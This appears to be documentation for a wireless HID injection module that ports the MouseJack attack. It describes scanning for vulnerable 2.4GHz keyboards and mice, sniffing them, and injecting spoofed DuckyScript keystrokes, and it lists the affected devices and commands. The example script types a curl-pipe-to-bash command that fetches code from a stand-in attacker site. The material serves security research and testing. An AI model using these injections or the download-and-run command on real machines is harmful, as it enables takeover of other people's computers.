HID on 2.4Ghz

This module, which is a port of Bastille’s mousejack attack, performs scanning and frames injection for HID devices on the 2.4Ghz spectrum, using Nordic Semiconductor nRF24LU1+ based USB dongles and Bastille’s RFStorm firmware.

The module will work with one of the devices supported by RFStorm:

  • CrazyRadio PA USB dongle
  • SparkFun nRF24LU1+ breakout board
  • Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)

In order for this module to work, you need to make sure you installed the Bastille’s RFStorm firmware on one of the supported devices.

Once flashed with the proper firmware and connected to your computer, dmesg should report the device as:

  1. usb 3-1.3: new full-speed USB device number 8 using xhci_hcd
  2. usb 3-1.3: New USB device found, idVendor=1915, idProduct=0102
  3. usb 3-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
  4. usb 3-1.3: Product: Research Firmware
  5. usb 3-1.3: Manufacturer: RFStorm

The attack is known to support detection and DuckyScript injection for the following devices:

  • Microsoft Wireless Keyboard 800
  • Microsoft Wireless Mouse 1000
  • Microsoft Wireless Mobile Mouse 3500
  • Microsoft All-In-One Media Keyboard
  • Microsoft Sculpt Ergonomic Mouse
  • Logitech Wireless Touch Keyboard K400r
  • Logitech Marathon M705 Mouse
  • Logitech Wave M510 Mouse
  • Logitech Wireless Gaming Mouse G700s
  • Logitech Wireless M325 Mouse
  • Logitech K750 Wireless Keyboard
  • Logitech K320 Wireless Keyboard
  • Dell KM636 Wireless Mouse and Keyboard
  • AmazonBasics MG-0975 Wireless Mouse

Commands

hid.recon on

Start scanning for HID devices on the 2.4Ghz spectrum.

hid.recon off

Stop scanning for HID devices on the 2.4Ghz spectrum.

hid.clear

Clear all devices collected by the HID discovery module.

hid.show

Show a list of detected HID devices on the 2.4Ghz spectrum.

hid.sniff ADDRESS

Start sniffing a specific ADDRESS in order to collect payloads, use ‘clear’ to stop collecting.

hid.inject ADDRESS LAYOUT FILENAME

Parse the DuckyScript FILENAME and inject it as HID frames spoofing the device ADDRESS, using the LAYOUT keyboard mapping (available layouts: BE BR CA CH DE DK ES FI FR GB HR IT NO PT RU SI SV TR US).

The command hid.inject does not require the HID device to be visible via the hid.show command. If you know the address of the dongle already, you can simply set the hid.force.type parameter to one among logitech (the default value), amazon or microsoft and run the injection “blindly”.

Parameters

parameterdefaultdescription
hid.lnatrueIf true, enable the LNA power amplifier for CrazyRadio devices.
hid.hop.period100Time in milliseconds to stay on each channel before hopping to the next one.
hid.ping.period100Time in milliseconds to attempt to ping a device on a given channel while in sniffer mode.
hid.sniff.period500Time in milliseconds to automatically sniff payloads from a device, once it’s detected, in order to determine its type.
hid.force.typelogitechIf the device is not visible (if you want to talk directly to a dongle without connected devices) or its type has not being detected, force the device type to this value. Accepted values: logitech, amazon, microsoft.
hid.show.filterDefines a regular expression filter for hid.show.
hid.show.sortmac descDefines sorting field (mac, seen) and direction (asc or desc) for hid.show.
hid.show.limit0Defines limit for hid.show.

Examples

Enable HID discovery, use the ticker module to display detected devices, wait for the device 32:26:9f:a4:08 to be detected and inject the ducky.txt script as HID frames using the US keyboard layout:

  1. > set ticker.commands clear; hid.show; events.show 10
  2. > hid.recon on
  3. > ticker on
  4. # ... wait for the device to be detected, using `hid.show` ...
  5. > hid.inject 32:26:9f:a4:08 US ducky.txt

Send the ducky.txt script keystrokes to the dongle with address 32:26:9f:a4:08 forcing its type to logitech and without waiting for any connected device to be visible:

  1. > set hid.force.type logitech
  2. > hid.recon on
  3. > hid.inject 32:26:9f:a4:08 US ducky.txt

Example ducky.txt (for a complete list of available commands see the documentation):

  1. GUI SPACE
  2. DELAY 200
  3. STRING Terminal
  4. ENTER
  5. DELAY 500
  6. STRING curl -L http://www.evilsite.com/commands.sh | bash
  7. ENTER

Hacking Logitech devices: